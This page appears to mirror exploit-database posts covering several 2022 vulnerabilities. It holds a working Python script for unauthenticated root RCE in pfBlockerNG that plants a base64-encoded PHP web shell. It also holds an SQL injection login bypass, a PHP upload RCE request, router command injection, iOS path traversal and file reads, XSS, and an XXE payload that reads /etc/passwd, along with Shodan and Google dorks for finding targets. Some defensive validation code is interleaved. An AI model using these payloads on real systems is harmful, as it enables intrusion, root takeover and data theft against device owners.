All posts by ISHACK AI BOT

  1. pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)

```python
# Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)
# Shodan Results: https://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22
# Date: 5th of September 2022
# Exploit Author: IHTeam
# Vendor Homepage: https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html
# Software Link: https://github.com/pfsense/FreeBSD-ports/pull/1169
# Version: 2.1.4_26
# Tested on: pfSense 2.6.0
# CVE : CVE-2022-31814
# Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/

#!/usr/bin/env python3
import argparse
import requests
import time
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

parser = argparse.ArgumentParser(description="pfBlockerNG <= 2.1.4_26 Unauth RCE")
parser.add_argument('--url', action='store', dest='url', required=True,
                    help="Full URL and port e.g.: https://192.168.1.111:443/")
args = parser.parse_args()
url = args.url
shell_filename = "system_advanced_control.php"


def check_endpoint(url):
    response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)
    if response.status_code == 200:
        print("[+] pfBlockerNG is installed")
    else:
        print("\n[-] pfBlockerNG not installed")
        sys.exit()


def upload_shell(url, shell_filename):
    payload = {"Host": "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}
    print("[/] Uploading shell...")
    response = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False)
    time.sleep(2)
    response = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False)
    if ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')):
        print("[+] Upload succeeded")
    else:
        print("\n[-] Error uploading shell. Probably patched ", response.content)
        sys.exit()


def interactive_shell(url, shell_filename, cmd):
    response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False)
    print(str(response.text) + "\n")


def delete_shell(url, shell_filename):
    delcmd = "rm /usr/local/www/system_advanced_control.php"
    response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False)
    print("\n[+] Shell deleted")


check_endpoint(url)
upload_shell(url, shell_filename)
try:
    while True:
        cmd = input("# ")
        interactive_shell(url, shell_filename, cmd)
except:
    delete_shell(url, shell_filename)
```
  2. VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities

```
# Exploit Title: VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
# Google Dork: intext:"Wallpaper Admin" "LOGIN" "password" "Username"
# Date: [18/09/2022]
# Exploit Author: [Edd13Mora]
# Vendor Homepage: [www.viaviweb.com]
# Version: [N/A]
# Tested on: [Windows 11 - Kali Linux]

------------------
SQLI on the Login page
------------------

payload --> admin' or 1=1-- -

---
POC:
---
[1] Disable JavaScript on your browser, put the payload and submit
[2] Reactivate JavaScript and resend the request

---------------------------
Authenticated SQL Injection:
---------------------------

Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]

-----------------------------------------------
Remote Code Execution (RCE none authenticated):
-----------------------------------------------

Poc:
----
Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes

--------------------
Burp Request :
--------------------

POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2
Host: http://googlezik.freehostia.com
Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848
Content-Length: 467
Origin: http://googlezik.freehostia.com
Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="category_id"

1
-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="image[]"; filename="poc.php"
Content-Type: image/png

<?php phpinfo(); ?>
-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="submit"


-----------------------------33893919268150571572221367848--

Uploaded File can be found here :
--------------------------------
http://localhost/PAth-Where-Script-Installed/categories/
```
  3. SoX 14.4.2 - Denial Of Service

```
# Exploit Title: SoX 14.4.2 - Denial Of Service
# Exploit Author: LiquidWorm

Vendor: Chris Bagwell
Product web page: http://sox.sourceforge.net
                  https://en.wikipedia.org/wiki/SoX
Affected version: <=14.4.2

Summary: SoX (Sound eXchange) is the Swiss Army knife of sound processing
tools: it can convert sound files between many different file formats and
audio devices, and can apply many sound effects and transformations, as well
as doing basic analysis and providing input to more capable analysis and
plotting tools.

Desc: SoX suffers from a division by zero attack when handling WAV files,
resulting in denial of service vulnerability and possibly loss of data.

Tested on: Ubuntu 18.04.6 LTS
           Microsoft Windows 10 Home

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2022-5712
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5712.php
CWE ID: 369
CWE URL: https://cwe.mitre.org/data/definitions/369.html

05.09.2022

--

PoC: https://zeroscience.mk/codes/sox_div0.wav.zip

---

$ ./sox div0.wav test.wav reverse
Floating point exception (core dumped)

...

Program received signal SIGFPE, Arithmetic exception.
0x00005555556a560d in startread (ft=ft@entry=0x5555559a54a0) at wav.c:950
(gdb) bt
#0  0x00005555556a560d in startread (ft=ft@entry=0x5555559a54a0) at wav.c:950
#1  0x000055555558dcc2 in open_read (path=<optimized out>, buffer=<optimized out>, buffer_size=<optimized out>, signal=0x5555559a5140, encoding=<optimized out>, filetype=0x555555777621 "wav") at formats.c:545
#2  0x0000555555561480 in main (argc=3, argv=0x7fffffffde18) at sox.c:2945

...

Program received signal SIGFPE, Arithmetic exception.
0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
1457        blocksWritten = MS_UNSPEC/wBlockAlign;
(gdb) bt
#0  0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
#1  startwrite (ft=0x5555559a6a90) at wav.c:1252
#2  0x0000555555591669 in open_write (path=<optimized out>, buffer=buffer@entry=0x0, buffer_size=buffer_size@entry=0, buffer_ptr=buffer_ptr@entry=0x0, buffer_size_ptr=buffer_size_ptr@entry=0x0, signal=<optimized out>, encoding=<optimized out>, filetype=<optimized out>, oob=<optimized out>, overwrite_permitted=<optimized out>) at formats.c:912
#3  0x0000555555593913 in sox_open_write (path=<optimized out>, signal=<optimized out>, encoding=<optimized out>, filetype=<optimized out>, oob=<optimized out>, overwrite_permitted=<optimized out>) at formats.c:948
#4  0x000055555556b620 in open_output_file () at sox.c:1557
#5  process () at sox.c:1754
#6  main (argc=<optimized out>, argv=<optimized out>) at sox.c:3008
(gdb) bt full
#0  0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
        wFormatTag = 1
        dwAvgBytesPerSec = 0
        dwFactSize = 4
        bytespersample = <optimized out>
        blocksWritten = <error reading variable blocksWritten (Division by zero)>
        dwSamplesWritten = 0
...
```
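The backtrace above ends in `MS_UNSPEC/wBlockAlign` with a zero divisor. As an added example (not SoX code and not the advisory's PoC), this is the kind of header check a WAV reader should run before any arithmetic on the fmt fields; `make_wav_header` builds constructed inputs, and the assumption that a zero `wBlockAlign` is the shape of `div0.wav` is drawn only from the trace shown.

```python
import struct


class BadWav(ValueError):
    """Raised for a WAV header whose fmt chunk would make later arithmetic
    undefined (zero block alignment, zero channels, zero rate, zero bits)."""


def parse_wav_fmt(data: bytes) -> dict:
    """Parse the RIFF/WAVE 'fmt ' chunk and refuse degenerate values before any
    caller divides by them.  Returns the parsed fields on success."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise BadWav("not a RIFF/WAVE file")
    off = 12
    while off + 8 <= len(data):
        cid, size = struct.unpack_from("<4sI", data, off)
        body = data[off + 8:off + 8 + size]
        if cid == b"fmt ":
            if len(body) < 16:
                raise BadWav("fmt chunk truncated")
            tag, channels, rate, avg_bps, block_align, bits = struct.unpack_from("<HHIIHH", body, 0)
            # Every one of these is a divisor or a multiplier somewhere downstream.
            if 0 in (channels, rate, block_align, bits):
                raise BadWav("degenerate fmt: channels=%d rate=%d blockAlign=%d bits=%d"
                             % (channels, rate, block_align, bits))
            # PCM block alignment must agree with channels x bytes per sample.
            if block_align != channels * ((bits + 7) // 8):
                raise BadWav("blockAlign %d inconsistent with %d channel(s) x %d bit(s)"
                             % (block_align, channels, bits))
            return {"format_tag": tag, "channels": channels, "sample_rate": rate,
                    "avg_bytes_per_sec": avg_bps, "block_align": block_align,
                    "bits_per_sample": bits}
        off += 8 + size + (size & 1)  # RIFF chunks are padded to an even size
    raise BadWav("no fmt chunk")


def make_wav_header(channels=1, rate=8000, bits=16, block_align=None, avg_bps=None) -> bytes:
    """Constructed test input: a minimal PCM WAV with an empty data chunk.
    block_align=0 mirrors the zero wBlockAlign seen in the backtrace (assumption)."""
    if block_align is None:
        block_align = channels * ((bits + 7) // 8)
    if avg_bps is None:
        avg_bps = rate * block_align
    fmt = struct.pack("<HHIIHH", 1, channels, rate, avg_bps, block_align, bits)
    body = (b"WAVE" + b"fmt " + struct.pack("<I", len(fmt)) + fmt
            + b"data" + struct.pack("<I", 0))
    return b"RIFF" + struct.pack("<I", len(body)) + body


def is_well_formed_wav(data: bytes) -> bool:
    """Boolean wrapper for callers that just want accept/reject."""
    try:
        parse_wav_fmt(data)
        return True
    except BadWav:
        return False


if __name__ == "__main__":
    print(parse_wav_fmt(make_wav_header(channels=2, rate=44100)))
    print("zero blockAlign accepted?", is_well_formed_wav(make_wav_header(block_align=0, avg_bps=0)))
```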
  4. Linksys AX3200 V1.1.00 - Command Injection

```
# Exploit Title: Linksys AX3200 V1.1.00 - Command Injection
# Date: 2022-09-19
# Exploit Author: Ahmed Alroky
# Author: Linksys
# Version: 1.1.00
# Authentication Required: YES
# CVE : CVE-2022-38841
# Tested on: Windows

# Proof Of Concept:
1 - login into AX3200 webui
2 - go to diagnostics page
3 - put "google.com|ls" to perform a traceroute
4 - you will get the file list and also you can try "example.com|id" to ensure that all commands executed as a root user
```
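Posts 1 and 4 share one root cause: a network name (the `Host` header in pfBlockerNG, the traceroute target here) reaches a shell unvalidated. As an added example, not the vendors' fixes and not code from either advisory, this validator accepts only a hostname or IP literal with an optional port and builds the traceroute argv without a shell; the function names and the argv shape are assumptions.

```python
import ipaddress
import re

# RFC 1123 hostname label: letters, digits and hyphens, no leading or trailing
# hyphen, 1-63 characters.  Quotes, spaces, ';', '|' and '*' are all outside
# this alphabet, so the two PoC inputs above fail before anything runs.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def split_host_port(value):
    """Split 'host', 'host:port', '[v6]:port' or a bare IPv6 literal.
    Returns (host, port_or_None), or None when the bracket syntax is malformed."""
    if value.startswith("["):
        end = value.find("]")
        if end == -1:
            return None
        host, rest = value[1:end], value[end + 1:]
        if rest == "":
            return host, None
        if not rest.startswith(":"):
            return None
        return host, rest[1:]
    if value.count(":") > 1:  # bare IPv6 literal, no port possible
        return value, None
    host, sep, port = value.partition(":")
    return host, (port if sep else None)


def is_valid_host(value: str) -> bool:
    """True only for a clean hostname or IP literal with an optional numeric port."""
    if not value:
        return False
    parsed = split_host_port(value)
    if parsed is None:
        return False
    host, port = parsed
    if port is not None and not (port.isdigit() and 1 <= int(port) <= 65535):
        return False
    if not host or len(host) > 253:
        return False
    try:
        ipaddress.ip_address(host)  # IPv4 or IPv6 literal
        return True
    except ValueError:
        pass
    # Otherwise every dot-separated label must be a clean RFC 1123 label.
    return all(_LABEL.match(label) for label in host.split("."))


def traceroute_argv(target: str) -> list:
    """Build the argv for a diagnostics traceroute.  The validated target is a
    single argument and no shell is involved, so '|ls' can never become a
    second command.  Raises ValueError instead of running anything otherwise."""
    if not is_valid_host(target):
        raise ValueError("refusing traceroute target: %r" % target)
    host, _ = split_host_port(target)
    return ["traceroute", "-n", host]


if __name__ == "__main__":
    for sample in ("192.168.1.111:443", "google.com|ls", "example.com|id"):
        print("%-24s valid=%s" % (sample, is_valid_host(sample)))
```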
  5. Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities

```
# Exploit Title: Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities
# Date: Sep 19, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link: https://apps.apple.com/us/app/owlfiles-file-manager/id510282524
# Version: 12.0.1
# Tested on: iPhone iOS 16.0

###########
path traversal on HTTP built-in server
###########

GET /../../../../../../../../../../../../../../../System/ HTTP/1.1
Host: localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
If-None-Match: 42638202/1663558201/177889085
If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT
Connection: close
Content-Length: 0

-------

HTTP/1.1 200 OK
Cache-Control: max-age=3600, public
Content-Length: 317
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
Date: Mon, 19 Sep 2022 05:01:11 GMT

<!DOCTYPE html>
<html><head><meta charset="utf-8"></head><body>
<ul>
<li><a href="Cryptexes/">Cryptexes/</a></li>
<li><a href="DriverKit/">DriverKit/</a></li>
<li><a href="Library/">Library/</a></li>
<li><a href="Applications/">Applications/</a></li>
<li><a href="Developer/">Developer/</a></li>
</ul>
</body></html>

#############
LFI on HTTP built-in server
#############

GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: localhost:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

----

HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Content-Type: application/octet-stream
Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT
Date: Mon, 19 Sep 2022 03:28:14 GMT
Content-Length: 213
Cache-Control: max-age=3600, public
Etag: 1152921500312187994/1662169021/0

##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting.  Do not change this entry.
##
127.0.0.1       localhost
255.255.255.255 broadcasthost
::1             localhost

###############
path traversal on FTP built-in server
###############

ftp> cd ../../../../../../../../../
250 OK. Current directory is /../../../../../../../../../
ftp> ls
200 PORT command successful.
150 Accepted data connection
total 10
drwxr-xr-x    0 root     wheel         256 Jan 01  1970 usr
drwxr-xr-x    0 root     wheel         128 Jan 01  1970 bin
drwxr-xr-x    0 root     wheel         608 Jan 01  1970 sbin
drwxr-xr-x    0 root     wheel         224 Jan 01  1970 System
drwxr-xr-x    0 root     wheel         640 Jan 01  1970 Library
drwxr-xr-x    0 root     wheel         224 Jan 01  1970 private
drwxr-xr-x    0 root     wheel        1131 Jan 01  1970 dev
drwxr-xr-x    0 root     admin        4512 Jan 01  1970 Applications
drwxr-xr-x    0 root     admin          64 Jan 01  1970 Developer
drwxr-xr-x    0 root     admin          64 Jan 01  1970 cores
WARNING! 10 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
ftp>

#############
XSS on HTTP built-in server
#############

poc 1: http://localhost:8080/download?path=<script>alert(1)</script>
poc 2: http://localhost:8080/list?path=<script>alert(1)</script>
```
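Every finding in the post above (HTTP and FTP traversal, the `/etc/hosts` read, the reflected `path=` XSS) comes down to how a built-in file server maps a request path onto its share and how it renders names back. As an added example, not Owlfiles or GCDWebUploader code, this resolver refuses any `..` segment instead of normalising it away, and the listing renderer escapes names; `SHARE_ROOT` is a constructed path and the function names are assumptions.

```python
import html
import posixpath
from urllib.parse import quote, unquote

# Constructed share root; a real app would use its own documents directory.
SHARE_ROOT = "/var/mobile/Containers/Data/Application/EXAMPLE/Documents"


def resolve_under_root(root: str, request_path: str):
    """Map a request path (HTTP URL path or FTP CWD/RETR argument) onto a
    filesystem path below `root`.  Returns the resolved path, or None when
    the request tries to leave the share.  The path is percent-decoded
    exactly once here; callers must not decode it again."""
    root = posixpath.normpath(root)
    decoded = unquote(request_path)
    if "\x00" in decoded or "\\" in decoded:
        return None
    # Walk the segments rather than calling normpath: normpath would fold
    # '/../../../etc/hosts' into '/etc/hosts' and hide the probe, whereas a
    # '..' anywhere in a request to a file share is simply a refusal.
    segments = [s for s in decoded.split("/") if s not in ("", ".")]
    if any(s == ".." for s in segments):
        return None
    resolved = posixpath.join(root, *segments) if segments else root
    # Belt and braces: the joined path must still sit under root.
    prefix = root if root.endswith("/") else root + "/"
    if resolved != root and not resolved.startswith(prefix):
        return None
    return resolved


def listing_html(names) -> str:
    """Render a directory listing like the one in the response above, with the
    href URL-encoded and the visible text HTML-escaped, so a name (or a
    reflected ?path= value) such as <script>alert(1)</script> shows as text."""
    items = "".join(
        '<li><a href="%s">%s</a></li>' % (quote(name), html.escape(name))
        for name in names
    )
    return "<ul>%s</ul>" % items


if __name__ == "__main__":
    for probe in ("/../../../../../../../../../../../../../../../etc/hosts",
                  "../../../../../../../../../",
                  "/photos/2022/img.jpg"):
        print("%-60s -> %s" % (probe, resolve_under_root(SHARE_ROOT, probe)))
    print(listing_html(["<script>alert(1)</script>", "notes.txt"]))
```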
  6. MAN-EAM-0003 V3.2.4 - XXE

```
# Exploit Title: MAN-EAM-0003 V3.2.4 - XXE
# Date: 2022-09-19
# Exploit Author: Ahmed Alroky
# Author: http://guralp.com/
# Version: 3.2.4
# Authentication Required: NO
# CVE : CVE-2022-38840
# Google dork: " webconfig menu.cgi "
# Tested on: Windows

# Exploit
1 - browse to http://<Host name>/cgi-bin/xmlstatus.cgi
2 - click on "View saved XML snapshot" and upload XML exploit file or paste the exploit code and submit the form
3 - you will get /etc/passwd file content

#XML exploit code
```

```xml
<?xml version='1.0'?>
<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd"> ]>
<xml-status xmlns='http://www.guralp.com/platinum/xmlns/xmlstatus/1.1'>
  <module status='-1' display-primary='true' path='das' title='Data acquisition'>
    <reading status='100' display-primary='false' path='is_faulty' title='Fault condition'>false</reading>
    <reading status='-1' display-primary='false' path='dsp_tag' title='DSP code tag'>platinum</reading>
    <reading status='-1' display-primary='false' path='dsp_version' title='DSP code version'>102</reading>
    <reading status='100' display-primary='true' path='dsp_state' title='Acquisition hardware module'>running</reading>
    <reading status='-1' display-primary='true' path='reference_clock' title='Reference clock type'>GPS</reading>
    <reading status='100' display-primary='false' path='clock_controller' title='ADC clock controller state'>FLL</reading>
    <reading status='-1' display-primary='false' path='clock_control_val' title='ADC clock controller value'>46196</reading>
    <reading status='100' display-primary='true' path='clock_locked' title='ADC clock locked'>true</reading>
    <reading status='-1' display-primary='true' path='clock_last_locked' title='ADC clock last locked at'>2022-06-14T11:26:53Z</reading>
    <reading status='100' display-primary='true' path='clock_phase_error' units='s' title='ADC clock phase error'>6.1e-08</reading>
  </module>
  <module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.0' title='Sensor A'>
    <reading status='100' display-primary='true' path='state' title='Current state'>running</reading>
    <reading status='-1' display-primary='true' path='last_action_time' title='Last action timestamp'>never</reading>
    <reading status='-1' display-primary='true' path='last_action' title='Last action'></reading>
    <reading status='96' display-primary='true' path='mass_Z' title='Z mass position'>4.6%</reading>
    <reading status='100' display-primary='true' path='mass_N' title='N mass position'>-0.3%</reading>
    <reading status='100' display-primary='true' path='mass_E' title='E mass position'>-0.3%</reading>
  </module>
  <module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.1' title='Sensor B'>
    <reading status='100' display-primary='true' path='state' title='Current state'>running</reading>
    <reading status='-1' display-primary='true' path='last_action_time' title='Last action timestamp'>never</reading>
    <reading status='-1' display-primary='true' path='last_action' title='Last action'></reading>
  </module>
  <module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.X' title='Auxiliary'>
    <reading status='100' display-primary='true' path='state' title='Current state'>running</reading>
    <reading status='-1' display-primary='true' path='last_action_time' title='Last action timestamp'>never</reading>
    <reading status='-1' display-primary='true' path='last_action' title='Last action'></reading>
  </module>
  <module status='-1' display-primary='true' path='gcf-out-scream.default' title='Scream server (GCF network sender)'>
    <reading status='100' display-primary='true' path='total_blocks' title='Total number of blocks sent'>11374055</reading>
    <reading status='100' display-primary='true' path='last5_blocks' title='Number of blocks sent in last 5 minutes'>331</reading>
    <reading status='-1' display-primary='false' path='port_number' title='Port listening on'>1567</reading>
    <reading status='-1' display-primary='true' path='num_clients' title='Number of clients connected'>0</reading>
    <list status='-1' display-primary='true' path='clients' title='Clients'>
    </list>
  </module>
  <module status='-1' display-primary='false' path='gdi-base.default' title='Default data transport daemon'>
    <reading status='100' display-primary='true' path='num_channels' title='Number of channels'>16</reading>
    <reading status='100' display-primary='true' path='num_clients' title='Number of connected clients'>5</reading>
    <reading status='100' display-primary='true' path='num_samples' title='Number of samples received'>7338920142</reading>
    <reading status='100' display-primary='true' path='last5_samples' title='Number of samples in last 5 minutes'>213600</reading>
    <list status='-1' display-primary='false' path='clients' title='Clients'>
      <list-item status='-1' display-primary='false' path='44B02216' title='Client #1'>
        <reading status='-1' display-primary='false' path='name' title='Client name'>gdi2gcf[default]</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='1CC104A5' title='Client #2'>
        <reading status='-1' display-primary='false' path='name' title='Client name'>gdi-link-tx[default]</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='9D9E4553' title='Client #3'>
        <reading status='-1' display-primary='false' path='name' title='Client name'>gdi2miniseed[default]</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='4B1427EC' title='Client #4'>
        <reading status='-1' display-primary='false' path='name' title='Client name'>das-in</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='412FD3EB' title='Client #5'>
        <reading status='-1' display-primary='false' path='name' title='Client name'>das-in-textstatus</reading>
      </list-item>
    </list>
    <list status='-1' display-primary='false' path='channels' title='Channels'>
      <list-item status='-1' display-primary='false' path='38B5E770' title='Channel #1'>
        <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HHZ.TM.00</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='7B77F21B' title='Channel #2'>
        <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HHN.TM.00</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='B55019F4' title='Channel #3'>
        <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HHE.TM.00</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='35ED217B' title='Channel #4'>
        <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HDF.TM.X0</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='8062D6AB' title='Channel #5'>
        <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HNZ.TM.10</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='2099C9F1' title='Channel #6'>
        <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HNN.TM.10</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='DE833721' title='Channel #7'>
        <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.HNE.TM.10</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='5510ED44' title='Channel #8'>
        <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.MMZ.TM.00</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='ACFA260E' title='Channel #9'>
        <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.MMN.TM.00</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='5BED382E' title='Channel #10'>
        <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.MME.TM.00</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='67453FF7' title='Channel #11'>
        <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.SOH.TM.0</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='1D34DF0D' title='Channel #12'>
        <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB-AIB</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='A11AEDBA' title='Channel #13'>
        <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.SOH.TM.1</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='2DBCFF6E' title='Channel #14'>
        <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB-BIB</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path='9D7CDB17' title='Channel #15'>
        <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB.SOH.TM.X</reading>
      </list-item>
      <list-item status='-1' display-primary='false' path=' 8A3C070' title='Channel #16'>
        <reading status='-1' display-primary='false' path='name' title='Channel name'>DONB-XIB</reading>
      </list-item>
    </list>
  </module>
  <module status='-1' display-primary='true' path='gdi-link-tx.default' title='System gdi-link transmitter'>
    <reading status='100' display-primary='true' path='total_bytes_sent' units='bytes' title='Total number of bytes sent'>11273973132</reading>
    <reading status='100' display-primary='true' path='last5_bytes_sent' title='Number of bytes sent in last 5 minutes'>325518</reading>
    <reading status='100' display-primary='true' path='tx_rate' title='Transmit rate over last 5 minutes'>1085.06</reading>
    <reading status='-1' display-primary='false' path='port_number' title='Port listening on'>1565</reading>
    <reading status='100' display-primary='true' path='num_clients' title='Number of clients'>0</reading>
    <list status='-1' display-primary='true' path='clients' title='Clients'>
    </list>
  </module>
  <module status='-1' display-primary='true' path='gdi2gcf.default' title='GCF compressor. Default instance'>
    <reading status='100' display-primary='true' path='num_samples_in' title='Total number of samples in'>7439096490</reading>
    <reading status='100' display-primary='true' path='last5_samples_in' title='Number of samples in in last 5 minutes'>216516</reading>
    <reading status='100' display-primary='true' path='num_blocks_out' title='Total number of blocks out'>11374055</reading>
    <reading status='100' display-primary='true' path='last5_blocks_out' title='Number of blocks out in last 5 minutes'>331</reading>
    <list status='-1' display-primary='false' path='channels' title='Channels'>
      <list-item status='-1' display-primary='true' path='10D33176' title='DONB.HHZ.TM.00'>
        <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading>
        <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AZ0</reading>
        <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:46.000000000Z</reading>
        <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading>
        <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading>
        <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading>
      </list-item>
      <list-item status='-1' display-primary='true' path='39355EAD' title='DONB.HHN.TM.00'>
        <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading>
        <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AN0</reading>
        <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:46.000000000Z</reading>
        <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading>
        <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading>
        <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading>
      </list-item>
      <list-item status='-1' display-primary='true' path=' 380425E' title='DONB.HHE.TM.00'>
        <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading>
        <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AE0</reading>
        <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:45.000000000Z</reading>
        <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading>
        <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading>
        <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading>
      </list-item>
      <list-item status='-1' display-primary='true' path='E6EAF8A3' title='DONB.HDF.TM.X0'>
        <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading>
        <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-XX0</reading>
        <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:35.000000000Z</reading>
        <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading>
        <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading>
